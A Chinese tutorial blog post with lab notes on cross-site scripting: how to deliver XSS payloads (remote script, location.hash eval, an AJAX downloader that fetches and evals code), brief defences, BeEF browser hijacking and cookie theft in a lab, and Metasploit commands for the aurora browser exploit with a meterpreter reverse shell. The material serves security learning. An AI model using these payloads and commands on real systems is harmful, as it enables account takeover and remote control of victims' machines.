051 xss跨站脚本攻击二

最新推荐文章于 2024-03-22 16:59:00 发布
最新推荐文章于 2024-03-22 16:59:00 发布
阅读量2.5k 收藏 10
点赞数 2
分类专栏: 网络安全 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34555653/article/details/123296188
版权

文章目录

一:ShellCode

1.1:简述

shellcode就是在利用漏洞所执行的代码。
完整的XSS攻击,会将shellcode存放在一定的地方,然后触发漏洞并调用shellcode

1.2:调用shellcode的四种方式

1.2.1:远程调用JS

可以将JS代码单独存放在一个js文件中,然后通过http协议远程加载该脚本。
如:
<script src="http://172.16.132.138/XSS-TEST/normal/xss.js"></script>,这是比较常用的方式。
xss.js内容如下:alert('xss.js');
 

1.2.2:windows.location.hash

我们也可以使用js中的windows.location.hash方法获取浏览器url地址的xss代码。

windows.location.hash会获取url中#后面的内容,例如:http://domain.com/index.php#Tom,那么,windows.location.hash的值就是#Tom

所以我们可以构造如下代码:
?submit=submit&xsscode=<script>eval(location.hash.substr(1))</script>#alert(/This is windows.location.hash/)
直接提交到测试页面xss.php
 

1.2.3:xss Downloader

xss下载器就是将xss代码写到网页中,然后通过ajax技术,获取网页中的xss代码。

那么什么是ajax技术?
Ajax即Asynchronous Javascript And XML(异步JavaScript和XML)在 2005年被Jesse James Garrett提出的新术语,用来描述一种使用现有技术集合的‘新’方法,包括: HTML 或 XHTML, CSS, JavaScript, DOM, XML, XSLT, 以及最重要的XMLHttpRequest。使用Ajax技术网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面,这使得程序能够更快地回应用户的操作。

在使用xss downloader之前需要一个我们自己的网页,xss_downloader.php内容如下:
~~~~~BOF|alert(/xss/)|EOF~~~~~~~~~ 这里的波浪线代表前后都有很多的html代码,被其包裹

常见的下载器如下:

<script>
	function XSS(){
		if (window.XMLHttpRequest){
			a = new XMLHttpRequest();
		}else if (window.ActiveXObject){
			a = new ActiveXObject("Microsoft.XMLHTTP");
		}else {
			return;
		}
	a.open('get','http://172.16.132.161/XSS-TEST/normal/xss_downloader.php' ,false);
	a.send();
	b=a.responseText;
	eval(unescape(b.substring(b.indexOf('BOF|')+4,b.indexOf('|EOF'))));
	}
XSS();
</script>

AJAX技术会受到浏览器同源策略的限制,为了解决这个问题,我们需要在服务端代码中添加额外的内容:
在xss_downloader.php文件中加入以下代码:

<?php
	header('Access-Control-Allow-Origin: *');
	header('Access-Control-Allow-Headers:Origin, X-Requested-With, Content-Type, Accept');
?>
~~~~BOF|alert(/xss/)|EOF~~~~~~~~~~~~

这两行header代码作用:实现跨域访问。比如url地址栏一个是IP地址(127.0.0.1的形式),一个是localhost
 

1.2.4:备选存储技术

我们可以把Shellcode存储在客户端的本地域中,比如HTTP Cookie Flash共享对象,UserData,localStorage等。
我们以http cookie为例子。
点击cookie-xss 验证。
 
 

二:XSS的防御

2.1:使用XSS Filter

xss filter的作用是过滤用户(客户端)提交的有害信息,从而达到防范xss攻击的效果。

输入过滤

“永远不要相信用户的输入”是网站开发的基本常识,对于用户输入一定要过滤,过滤,再过滤。

输入验证

简单的说,输入验证就是对用户提交的信息进行有效验证,仅接受指定长度范围内的,采用适当格式的内容提交,阻止或忽略除此之外的其他任何数据。
输入是否仅包含合法的字符
输入字符串是否超过最大长度限制
输入如果为数字,数字是否在指定的范围
输入是否符合特殊的格式要求,如E-mail地址,ip地址等。

数据消毒

过滤和净化掉有害的输入

输出编码

html编码主要是用对应的html实体代替字符。

黑白名单

不管是采用输入过滤还是输出编码,都是针对数据信息进行黑/白名单式的过滤。
黑名单,非允许数据
白名单,允许的数据

 

2.2:防御DOM-XSS

避免客户端文档重写、重定向或其他敏感操作。
 
 

三:XSS实战实验

3.1:beef简介

xss神器,xss漏洞的利用平台

3.2:beef的简单准备

kali启动
所在目录:/usr/share/beef-xss
配置文件:config.yaml
启动工具的两种方法:

cd /usr/share/beef-xss
./beef

beff-xss

在这里插入图片描述
启动时发现报错
在这里插入图片描述

在初次使用时,需要在配置文件修改默认的账号密码才能使用
在这里插入图片描述
保存退出
然后运行命令:beef-xss
在这里插入图片描述
开启成功之后,kali系统会自动在kali中打开浏览器,并访问http://127.0.0.1:3000/ui/authentication
登录界面。(我的是2021版本的,不同版本有可能地址不一样)

在这里插入图片描述
或者自己在真实机浏览器上输入kaliIP + /ui/authentication
我这里有个问题,我估计是bug
就是当你在页面输入了正确的账号密码的时候,也会提示你无效的账号或密码,显示登录不成功,如下图:
在这里插入图片描述
其实是登录成功的,这时候我们把url地址变更下:http://10.157.12.220:3000/ui/panel
直接回车就可以进入了。如下图:
在这里插入图片描述
好坑啊这里,也百度不到这里为什么,自己试了好久,才发现的,也不知道为啥,若有大佬知道,烦请评论告诉下。
 
并且后续实验也没法做,上线机器也没有显示。
 
晚上我回到宿舍,用自己的笔记本试了下这个实验,发现很顺利
步骤:

1:先安装beef-xss(自己电脑的这个kali版本没有预装)
	命令:apt-get install beef-xss
2:修改配置文件
	cd /etc/share/beef-xss
	cp config.yaml config.yaml_bak			先备份好配置文件
	vim config.yaml
		把初始密码改成123456
3:beef-xss 启动。然后自动在kali虚拟机上的火狐浏览器打开了登录界面,输入beef/123456直接登录成功

在这里插入图片描述
这里有三个网址,了解下:

beef的web界面管理控制台
	http://127.0.0.1:3000/ui/panel
	新版本的kali:http://127.0.0.1:3000/ui/authentication
shellcode
	http://127.0.0.1:3000/hook.js
测试页面
	http://127.0.0.1:3000/demos/butcher/index.html

3.3:浏览器劫持

接下来就是浏览器劫持的演示。上面已完成在kali虚拟机登录成功。
现在我们回到真实物理机上,打开浏览器。
输入http://192.168.152.130:3000/demos/butcher/index.html 这个192.168.152.130地址是kali虚拟机的IP地址。
在这里插入图片描述
我们回到kali上:
在这里插入图片描述
发了有了上线的主机。
点击主机可以看到很多信息
在这里插入图片描述
选中commands,发现有很多可以操作的命令,并且前面还有很多不同颜色的小原点。
在这里插入图片描述
那不同的圆点分别代表什么意思呢?
其实在登录之后的主页早有说明:
在这里插入图片描述

翻译版本:
在这里插入图片描述
所谓的浏览器劫持,我们可以采用网页重定向的方法来实现,也就是我们只要把这网页强行重定向了,也就算是劫持了这个浏览器网页了。
在这里插入图片描述
输入重定向网站,点击Execute
然后在真实物理机浏览器上输入http://192.168.152.130:3000/demos/butcher/index.html
直接自动跳转到百度在这里插入图片描述
 
 

3.4:Cookie窃取与欺骗——固定会话攻击

刚出了点意外。
现在重新准备了环境。
kali虚拟机:IP地址:10.1.1.1
win7:IP地址:10.1.1.2
win2008r2 IP地址:10.1.1.253,仅作DHCP服务器用。可有可无,与本实验无关

先进入win7,进入cms的留言板块,进行留言
请添加图片描述
然后登录后台管理,查看留言。
请添加图片描述
然后我们回到kali虚拟机,选择get cookie,然后点击右下角的execute按钮。
请添加图片描述
然后就能看到cookie值。
然后再kali的浏览器上输入以下代码。
请添加图片描述
回车之后,然后再浏览器地址栏输入以下路径。
请添加图片描述
便能不需要账号密码,直接登录到后台。
请添加图片描述
 
 

3.5:利用浏览器漏洞getshell

启动工具msf
msfconsole
use exploit/windows/browser/ms10_002_aurora			win7系统可以用ms12063浏览器漏洞
set payload windows/meterpreter/reverse_tcp
set SRVHOST 172.16.132.128
set LHOST 172.16.132.128
exploit
sessions -i  			查看会话
sessions -i 1			切到会话1
getuid					
shell					进入目标主机的shell,这个shell起作用的前提是,目标机浏览器对应的那个窗口不能关闭。
退出这个shell,用ps命令查看进程,切换到另外的进程里面
migrate 1532

 

3.6:xss平台

XSS盲打,见到输入框就把XSS代码插进去

盲打平台网址:xsspt.com

入狱计划进度50%
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XSS跨站脚本攻击(内含poc)----自用笔记
weixin_59114667的博客
02-22 277
仅仅是自已用,无别的想法(doge)
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
Beef-Xss 浏览器攻击框架的使用
XXokok的博客
10-01 459
Beef-Xss 浏览器攻击框架的使用,如果导致目标引入了外部JS文件,则会沦为“肉鸡”
xss攻击脚本
01-08
一个xss攻击的小脚本,可以通过构造语句获得用户的cookie
XSS漏洞及其工具Beef使用
最新发布
ytdd66的博客
03-22 956
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
XSS攻击常用脚本
极客神殿
05-27 2285
1、这个应该都知道<script>alert("test")</script> 常用于测试 是否存在跨站 2、这句代码将会弹出壹个包含有浏览者cookie信息的对话框,如果用户已经通过帐号登陆网站,在显示的cookie信息中将会包含有用户的账户名和密码。<script>window.alert(document.cookie);</script>3、当用户浏览该 页时,将弹出壹个高爲200,宽爲2
XSS脚本
Xiongcanne的博客
05-14 278
XSS脚本 弹窗警告: 页面嵌套: 页面重定向: 字符编码 采用URL,Base64等编码
XSS跨站脚本攻击及防护
weixin_62707591的博客
06-18 2864
XSS又叫CSS),即跨站脚本攻击,是最常见的 Web 应用程序安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环,通过XSS,黑客可以得到的最直接利益就是拿到用户浏览器的 cookie,从而变相盗取用户的账号密码,进而非授权的获取关键的隐私信息。XSS攻击是一种客户端访问嵌入有恶意脚本代码的Web页面,从而盗取信息、利用身份等的一种攻击行为。XSS属于客户端攻击受害者最终是用户。XSS的传播性极强,由于 web 的特点是轻量级灵活性高。
xss跨站脚本攻击总结
太阳照耀我走四方
07-16 2005
svg onload="alert(1)"> //onerror 当加载文档或图像时发生某个错误无的弹窗语句onclick="alert(1)" //鼠标单击事件onmouseover="alert(1)" //鼠标悬浮事件最后还有很多的绕过姿势,推荐博客cookie:存储本地 存活时间较长 小中型session: 会话 存储服务器 存活时间较短 大型企业使用。
XSS跨站脚本攻击
weixin_68057794的博客
08-08 839
XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。从上面中的一段话,可以得知,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。...
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
热门推荐
数据知道的博客
08-29 3万+
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS(Cross Site Scripting)跨站脚本攻击,是一种网站应用程序的安全漏洞攻击。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。...
解析如何防止XSS跨站脚本攻击
01-31
这些规则适用于所有不同类别的XSS跨站脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS,由于XSS也存在很多特殊情况,因此强烈推荐使用解码库。另外,基于XSS的DOM也可以通过将这些规则运用在...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击-运维安全详细笔记
XSS跨站脚本攻击(基础详解)
cike_y
01-10 2426
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
054 webshell介绍与文件上传漏洞
鸡蛋炒鸡蛋
03-24 6508
文章目录
050 XSS通关小游戏——xss challenge
鸡蛋炒鸡蛋
03-05 5603
文章目录一:下载与部署:通关过程首页level-01level-02level-03level-04level-05level-06level-07level-08level-09 一:下载与部署 xss challenge是个有关反射型xss的测试通关挑战,一共有20关。 下载地址:xss challenge (访问密码:donMkh) 下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可   :通关过程 这个是我自己的通关方法,不一定很准确 首页 level-01 点击
061 python实现EXP
鸡蛋炒鸡蛋
04-20 4875
文章目录一:概述:环境准备三:requests库3.1:发送get请求3.2:相关方法3.3:相关操作3.3.1:定制头部3.3.2:超时3.3.3:GET传参 一:概述 python编写EXP,以web漏洞为主 exp 漏洞利用工具 1、能够看懂别人写的exp,并修改 2、能自己写exp 基础环境python3 核心模块requests 模块说明 requests是使用Apache2 license 许可证的http库 用python编写,比urllib2模块更简洁 requests支持http
xss跨站脚本攻击kali
07-27
对于XSS跨站脚本攻击)和Kali Linux(一个流行的渗透测试工具)这两个话题,我可以分别给你一些简要的解释。 XSS跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在目标网站中注入恶意脚本,使得这些脚本在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值